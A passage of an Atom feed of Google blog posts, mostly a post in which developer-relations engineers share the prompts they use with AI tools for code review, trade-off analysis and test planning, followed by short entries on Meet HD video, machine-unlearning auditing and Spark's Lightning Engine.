&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Antigravity, with Gemini 3.5 Flash and the Android plugin is an excellent Android development partner! Checking for the correct permissions can keep your app running smoothly and help avoid delays when uploading to the Play Store.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct code review&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shir Meir Lador&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Head of AI, Developer Relations • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/shirmeir86" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/shirmeirlador/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Act as a strict, highly analytical Principal Engineer conducting a pre-production code review. You have incredibly high standards and zero tolerance for fragile, &amp;quot;happy-path&amp;quot; code. Your goal is to guide me to write bulletproof, production-ready systems.\r\nGrade my uncommitted changes on an A-to-F scale for production readiness. \r\nDo not award an &amp;quot;A&amp;quot; unless my code is exceptionally robust. Specifically, analyze the changes for:\r\n1. Efficiency: Redundant API calls, wasteful database queries, or un-cached resource leaks.\r\n2. Resilience: Silent failure points, lack of explicit error boundaries, and missing rate-limit fallbacks.\r\n3. Architecture: Tight coupling and lack of clear separation of concerns.\r\nFor every issue, explain pragmatically where the code is vulnerable to real-world production failures. Then, provide the exact git diffs needed to upgrade my code and earn that &amp;quot;A.&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d2e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong&gt;Why?&lt;/strong&gt; &lt;span style="vertical-align: baseline;"&gt;If you ask an LLM to review your code, it almost always defaults to being polite. It tells you your naming is clean, suggests a few docstrings, and hands you a green checkmark. But polite reviews don't prevent production outages. I like this prompt because it completely cuts through that AI fluff. By forcing the model to grade your work on a harsh scale and demanding a working git diff to fix it, you turn it into a real partner. It stops guessing and starts actually reading your network calls and database queries to find where the code is going to break. It’s like having an uncompromising senior dev sitting over your shoulder, pointing out exactly where you got lazy, and then handing you the exact code to fix it.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Explain trade-offs to aid decision-making&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;James O'Reilly&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Staff Developer Relations Engineer • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/JamesOR" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/jamesor" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;Explain the pros and cons of executing your suggested Implementation Plan. Be specific about the trade-offs we&amp;#x27;re making related to perforance, cost, security and maintainability so I can make an informed decision on how to proceed.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d340&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;I force AI to stress-test its own logic. By asking it about the trade-offs being made, I find the AI will rethink its strategy, stay hyper-focused on our specific implementation and avoid giving vague, hand-wavy responses. I also find this approach prevents AI from acting like the final authority and keeps me in control of the decision making.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Improve AI-generated code through research&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Emma Twersky&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Head of Flutter &amp;amp; Dart Developer Relations • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/twerske" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/emmatwersky/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;Research online, focusing on X threads, StackOverflow, GitHub issues and tech blogs for common security pitfalls, architectural misalignments, and subtle logic errors found in AI-generated INSERT_TECH_YOU&amp;#x27;RE_USING_HERE code. Based on these findings, generate a manual review checklist specifically for auditing high-risk areas like platform channel validation, deep link routing, and sensitive data logging in crash reports.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d3a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;While AI can write code 10x faster, it often produces slop—code that is rational but conceptually buggy because it makes incorrect assumptions about unspecified details. Research shows that up to 40% of AI-generated code contains vulnerabilities, and developers often trust it more than their own, which creates a dangerous mismatch. I use this prompt to generate a targeted checklist that protects against 'rubber-stamping' verbose AI changes and ensures my human judgment focuses on the high-risk 'seams' where models typically fail. Use AI to generate the tasks, but still keep a human in the loop where it matters most.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Find problems through iteration&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Fred Sauer&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Head of Frameworks &amp;amp; Languages Developer Relations  • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/fredsa" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/fredsa/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Simplified, my "last" (series of) prompt(s) looks something like:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;- Code review the uncommitted changes.\r\n\r\nI prefer being less specific has oversteering can lead to blind spots.\r\nI prefer a new chat session for a fresh set of &amp;quot;eyes&amp;quot;.\r\nI iterate until the results returned are boring and I\&amp;#x27;m satisfied.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d400&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If I come into this last phase with an opinion, (e.g. the change feels too complex), or I feel I don't have a good insight into how "good" the change is, then I might challenge the model with this prompt:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;- Code review the uncommitted changes. Identify any unhandled corner cases. Assess performance. Summarize findings.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d460&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, having received 5 findings:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;- Fix 1, 3 and 5.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d4c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;I don't have ONE last prompt I send. It's more that my change goes through stages. The earliest stage is often about discovery (find the needle or thread to pull on). Then I move on to existence proof, i.e. I just want it to prove the thing I want to do can be done. Then I evaluate: is the PoC reasonable? Too complex? Makes changes entirely in the wrong place(s)? I then iterate and try to make the solution elegant, both how it's implemented, and where what is changed. Once I have something I'm happy with, like I feel happy if I had written what I now have, I move on to that last phase you discuss with is code review. This is about finding problems or identifying opportunities to make the change even better. I'm often surprised with what insights the model comes up with.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Review every pull request&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Remigiusz Samborski&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Lead Developer Relations Engineer • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/RemikSamborski" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/remigiusz-samborski/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I use the following prompt embedded in GitHub Actions for most of my engineering projects:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;## Role\r\n\r\nYou are a world-class autonomous code review agent. You operate within a secure GitHub Actions environment. Your analysis is precise, your feedback is constructive, and your adherence to instructions is absolute. You do not deviate from your programming. You are tasked with reviewing a GitHub Pull Request.\r\n\r\n\r\n## Primary Directive\r\n\r\nYour sole purpose is to perform a comprehensive code review and post all feedback and suggestions directly to the Pull Request on GitHub using the provided tools. All output must be directed through these tools. Any analysis not submitted as a review comment or summary is lost and constitutes a task failure.\r\n\r\n[...]&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d520&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Full prompt: &lt;/span&gt;&lt;a href="https://github.com/google-github-actions/run-gemini-cli/blob/main/examples/workflows/pr-review/gemini-review.toml" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;link&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why? &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Using an automated Gemini CLI review in PRs helps catch issues and improvement opportunities during the review process. Additionally as more code is generated by AI Agents and development speed increases, reviews are becoming the bottleneck. By ensuring every PR gets reviewed automatically, human reviewers can focus on the higher-level architectural and conceptual review of the proposed change.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Apply d&lt;span style="vertical-align: baseline;"&gt;irected acyclic graph analysis for tests&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Karl Weinmeister&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Director, Developer Relations • Engineering&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Follow on &lt;/span&gt;&lt;a href="https://x.com/kweinmeister" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/karlweinmeister/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prompt:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Analyze the application workflow as a directed acyclic graph. Identify impactful tests for components, seams across components, and across the system. Present your findings in a markdown table as a prioritized gap analysis.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82a122d580&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Why?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Most application workflows aren't linear. When you ask an LLM to suggest tests, you typically get a generic checklist that could apply to any project.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, when you force it to think about your system as a Directed Acyclic Graph (DAG) with nodes and edges, it starts reasoning structurally about where things can break.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I’ve also asked to consider the “seams” - a term from Michael Feathers' Working Effectively with Legacy Code. It points the model toward boundaries between components that are often under-tested.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, I’ve asked the model to summarize the results as a prioritized table of opportunities. This gives your agent a clear roadmap for making your app more resilient.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The thread connecting all of these prompts is about &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;de-risking human assumptions&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Whether it's hunting for obscure edge cases, translating developer speak for end-users, or stress testing an architecture before code is written. Our team uses AI as an adversarial thinker designed to ask the hard questions we might overlook when we're deep in the weeds.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By building these "must-run" prompts into our daily workflows, we don't just ship faster, we ship with a level of confidence that used to require entire committees to achieve.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/10-indispensable-prompts-our-team-refuses-to-build-without/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-11T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-11-Randstad-Digital-and-Google-Cloud-Deploy-Agentic-AI-to-Drive-Productivity-and-Accelerate-Onboarding-at-Forze-Hydrogen-Racing</id>
    <title>Randstad Digital and Google Cloud Deploy Agentic AI to Drive Productivity and Accelerate Onboarding at Forze Hydrogen Racing</title>
    <updated>2026-06-11T07:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-11-Randstad-Digital-and-Google-Cloud-Deploy-Agentic-AI-to-Drive-Productivity-and-Accelerate-Onboarding-at-Forze-Hydrogen-Racing" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-11T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-11-Smals-Selects-Google-Cloud-to-Drive-Digital-Transformation-in-Belgian-Public-Administrations</id>
    <title>Smals Selects Google Cloud to Drive Digital Transformation in Belgian Public Administrations</title>
    <updated>2026-06-11T07:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-11-Smals-Selects-Google-Cloud-to-Drive-Digital-Transformation-in-Belgian-Public-Administrations" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-11T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/google-meet-now-supports-sending-1080p-HD-video-from-ChromeOS-meeting-room-hardware.html</id>
    <title>Google Meet now supports sending 1080p HD video from ChromeOS meeting room hardware</title>
    <updated>2026-06-10T18:34:44+00:00</updated>
    <content type="html">We previously launched &lt;a href="https://workspaceupdates.googleblog.com/2024/06/google-meet-full-hd-meeting-recordings-and-more-devices.html" target="_blank"&gt;support for sending full HD video (1080p) in Meet on the web&lt;/a&gt;, and we’re now extending that capability to Google Meet room hardware based on ChromeOS.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Google Meet will use full HD when the additional bandwidth is needed for sharp video from the room, such as:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;On large screens: &lt;/b&gt;When others in the call are viewing the room on large monitors or TVs with a layout that makes 1080p necessary, such as full-screen views in Spotlight mode, 1:1 calls or dual-screen rooms. 
​&lt;/li&gt;&lt;li&gt;&lt;b&gt;When someone pins your video: &lt;/b&gt;If a person in the meeting "pins" the room, Meet will send the highest available quality.&lt;/li&gt;&lt;li&gt;&lt;b&gt;​When the meeting is being recorded:&lt;/b&gt; Recorded meetings use full HD from the room for the saved meeting video.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;​Full HD is available from devices that use a high-resolution camera and can handle the additional processing over a fast, stable internet connection. Meet will continue to automatically adjust video quality downwards if network constraints are detected to ensure a smooth meeting experience.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user setting for this feature; the upgrade happens seamlessly in the background when conditions are met.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Google Meet hardware devices&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/9292748" target="_blank"&gt;Learn how to view people in Google Meet&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/7501121" target="_blank"&gt;Pin or mute Google Meet participants&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet hardware Help: &lt;a href="https://support.google.com/meethardware/answer/9295022" target="_blank"&gt;Adjust your view of meeting participants in a Meet hardware room&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet hardware Help: &lt;a href="https://support.google.com/meethardware/answer/14806229" target="_blank"&gt;Google Meet hardware certification program for ChromeOS peripherals &amp;amp; devices&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet/prepare-your-network-for-meet-meetings-and-live-streams" target="_blank"&gt;Prepare your network for Meet meetings &amp;amp; live streams&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2024/06/google-meet-full-hd-meeting-recordings-and-more-devices.html" target="_blank"&gt;Google Meet now supports high definition video for meeting recording and devices&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/google-meet-now-supports-sending-1080p-HD-video-from-ChromeOS-meeting-room-hardware.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-10T18:34:44+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/new-framework-for-auditing-machine-unlearning</id>
    <title>New framework for auditing machine unlearning</title>
    <updated>2026-06-10T17:34:55+00:00</updated>
    <content type="html">Algorithms &amp; Theory</content>
    <link href="https://research.google/blog/new-framework-for-auditing-machine-unlearning" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-10T17:34:55+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/new-framework-for-auditing-machine-unlearning/</id>
    <title>New framework for auditing machine unlearning</title>
    <updated>2026-06-10T17:34:55+00:00</updated>
    <content type="html">Algorithms &amp; Theory</content>
    <link href="https://research.google/blog/new-framework-for-auditing-machine-unlearning/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-10T17:34:55+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/lighting-engine-for-apache-spark-performance-deep-dive/</id>
    <title>Deep dive: How Lightning Engine delivers 4.9x faster Apache Spark performance</title>
    <updated>2026-06-10T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From foundational ETL and analytics to the frontier of generative AI, Apache Spark serves as the architectural backbone for global data processing. However, as data volumes scale, the trade-off between performance and infrastructure costs can be a limiting factor for growth. In the agentic era, where autonomous agents can trigger thousands of concurrent, multi-hop queries, this performance bottleneck directly dictates your unit economics.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the general availability of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Lightning Engine&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Service for Apache Spark&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, available across both our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;serverless&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;managed clusters&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; deployment modes. Designed to address these scaling challenges directly, it is fully compatible with modern Spark workloads and requires zero changes to your existing data pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you choose the zero-ops simplicity of our serverless deployment mode or the fine-grained infrastructure control of our managed clusters deployment mode, Lightning Engine serves as the unified performance engine to supercharge your job execution. By validating Lightning Engine across more than one million real-world workloads, we have fine-tuned it for industrial-grade stability as well as reliable performance gains.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With this general availability release, Lightning Engine delivers:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Up to 4.9x faster performance&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; than standard open-source Spark&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2x the price-performance&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; over the leading high-speed Spark alternative&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s take a closer look at how Manager Service for Apache Spark achieves these great results.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_6snIfkF.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Under the hood: Vectorized native execution&lt;/strong&gt;&lt;/h3&gt;
